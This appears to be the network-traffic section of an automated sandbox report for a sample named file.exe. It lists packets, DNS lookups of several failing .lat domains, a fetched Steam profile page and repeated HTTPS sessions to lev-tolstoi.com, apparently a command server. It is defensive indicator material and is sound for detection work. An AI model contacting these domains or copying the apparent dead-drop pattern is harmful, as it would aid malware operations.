Jan 2, 2025 20:16:38.453291893 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.453331947 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.453336954 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.453371048 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.453409910 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.472929955 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.472956896 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.472971916 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.472978115 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.484042883 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.484078884 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:38.484222889 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.484509945 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.484519958 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:38.960742950 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:38.960921049 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.964041948 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.964052916 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:38.964456081 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:38.966089010 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.966145039 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:38.966186047 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:39.387799978 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:39.387931108 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:39.388098001 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:39.388242006 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:39.388242006 CET	49701	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:39.388262987 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:39.388276100 CET	443	49701	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:39.500657082 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:39.500713110 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:39.500793934 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:39.501270056 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:39.501286983 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.006087065 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.006202936 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.007793903 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.007803917 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.008181095 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.009886026 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.009917021 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.009984970 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457176924 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457242966 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457283974 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457320929 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457370043 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.457370043 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.457381964 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457443953 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457480907 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457525015 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457536936 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.457541943 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.457681894 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.461997986 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.462089062 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.462100029 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.462115049 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.462173939 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.462178946 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.512559891 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.544105053 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.544413090 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.544497013 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.547560930 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.547560930 CET	49702	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.547579050 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.547585964 CET	443	49702	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.684576988 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.684616089 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:40.684803963 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.685240030 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:40.685251951 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.147598028 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.147672892 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:41.149023056 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:41.149039984 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.149347067 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.150489092 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:41.150634050 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:41.150660038 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.971997023 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.972270966 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:41.972506046 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:41.972604990 CET	49703	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:41.972628117 CET	443	49703	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.118664026 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.118720055 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.119079113 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.119079113 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.119117975 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.581056118 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.581309080 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.582431078 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.582449913 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.582834959 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.583949089 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.584088087 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.584120989 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:42.588226080 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:42.635364056 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:43.401393890 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:43.401516914 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:43.401576996 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:43.401726961 CET	49704	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:43.401746988 CET	443	49704	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:43.760560989 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:43.760623932 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:43.760740995 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:43.761131048 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:43.761146069 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.220005035 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.220145941 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.221822977 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.221839905 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.222218037 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.223419905 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.223634958 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.223676920 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.223748922 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.223748922 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.223758936 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.267338991 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.875081062 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.875205994 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:44.875333071 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.875628948 CET	49705	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:44.875652075 CET	443	49705	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:45.406052113 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:45.406102896 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:45.406186104 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:45.406550884 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:45.406563044 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.058111906 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.058309078 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.060406923 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.060435057 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.060810089 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.062246084 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.062396049 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.062407017 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.554866076 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.555001020 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.555140018 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.555551052 CET	49706	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.555573940 CET	443	49706	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.609496117 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.609540939 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:46.609649897 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.610009909 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:46.610022068 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.123366117 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.123518944 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.125313997 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.125327110 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.125670910 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.127079964 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.127172947 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.127178907 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.622936010 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.623063087 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.623140097 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.623399019 CET	49708	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.623416901 CET	443	49708	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.628252983 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.628292084 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:47.628371000 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.628688097 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:47.628700972 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:48.194356918 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:48.194549084 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:48.196816921 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:48.196846962 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:48.197321892 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:48.210639000 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:48.210689068 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:48.210892916 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:49.034931898 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:49.034998894 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:49.035862923 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:49.038441896 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:49.038455963 CET	443	49714	172.67.157.254	192.168.2.7
Jan 2, 2025 20:16:49.038491011 CET	49714	443	192.168.2.7	172.67.157.254
Jan 2, 2025 20:16:49.038495064 CET	443	49714	172.67.157.254	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:16:36.519516945 CET	54538	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.528260946 CET	53	54538	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.532233953 CET	60167	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.541471004 CET	53	60167	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.543813944 CET	61164	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.552706003 CET	53	61164	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.555115938 CET	53937	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.563951969 CET	53	53937	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.565149069 CET	53377	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.574388027 CET	53	53377	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.577393055 CET	57664	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.586203098 CET	53	57664	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.589525938 CET	64956	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.598380089 CET	53	64956	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.600816011 CET	61692	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.609889984 CET	53	61692	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.612478018 CET	52039	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.621432066 CET	53	52039	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:36.624058008 CET	52216	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:36.632937908 CET	53	52216	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:38.476665974 CET	59313	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:38.483282089 CET	53	59313	1.1.1.1	192.168.2.7
Jan 2, 2025 20:16:43.597668886 CET	54365	53	192.168.2.7	1.1.1.1
Jan 2, 2025 20:16:43.759393930 CET	53	54365	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 20:16:36.519516945 CET	192.168.2.7	1.1.1.1	0xf4a3	Standard query (0)	enterwahsh.biz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.532233953 CET	192.168.2.7	1.1.1.1	0x1408	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.543813944 CET	192.168.2.7	1.1.1.1	0x7ab	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.555115938 CET	192.168.2.7	1.1.1.1	0xb3b4	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.565149069 CET	192.168.2.7	1.1.1.1	0x8e3c	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.577393055 CET	192.168.2.7	1.1.1.1	0x66ea	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.589525938 CET	192.168.2.7	1.1.1.1	0xbe07	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.600816011 CET	192.168.2.7	1.1.1.1	0xf3e1	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.612478018 CET	192.168.2.7	1.1.1.1	0xc042	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.624058008 CET	192.168.2.7	1.1.1.1	0x63f6	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:38.476665974 CET	192.168.2.7	1.1.1.1	0xdaca	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:43.597668886 CET	192.168.2.7	1.1.1.1	0x6bb0	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 20:16:36.528260946 CET	1.1.1.1	192.168.2.7	0xf4a3	Name error (3)	enterwahsh.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.541471004 CET	1.1.1.1	192.168.2.7	0x1408	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.552706003 CET	1.1.1.1	192.168.2.7	0x7ab	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.563951969 CET	1.1.1.1	192.168.2.7	0xb3b4	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.574388027 CET	1.1.1.1	192.168.2.7	0x8e3c	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.586203098 CET	1.1.1.1	192.168.2.7	0x66ea	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.598380089 CET	1.1.1.1	192.168.2.7	0xbe07	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.609889984 CET	1.1.1.1	192.168.2.7	0xf3e1	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.621432066 CET	1.1.1.1	192.168.2.7	0xc042	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:36.632937908 CET	1.1.1.1	192.168.2.7	0x63f6	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:38.483282089 CET	1.1.1.1	192.168.2.7	0xdaca	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:38.483282089 CET	1.1.1.1	192.168.2.7	0xdaca	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:43.759393930 CET	1.1.1.1	192.168.2.7	0x6bb0	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:16:43.759393930 CET	1.1.1.1	192.168.2.7	0x6bb0	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	104.102.49.254	443	4048	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:16:37 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-02 19:16:38 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 02 Jan 2025 19:16:38 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=7c542e9a362009d06e76ed69; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-02 19:16:38 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-02 19:16:38 UTC	16384	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2025-01-02 19:16:38 UTC	3768	IN	Data Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22 Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
